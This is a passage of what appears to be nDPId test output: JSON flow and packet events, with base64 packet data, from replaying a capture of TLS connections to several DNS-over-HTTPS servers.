oqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"}
00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"}
00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBB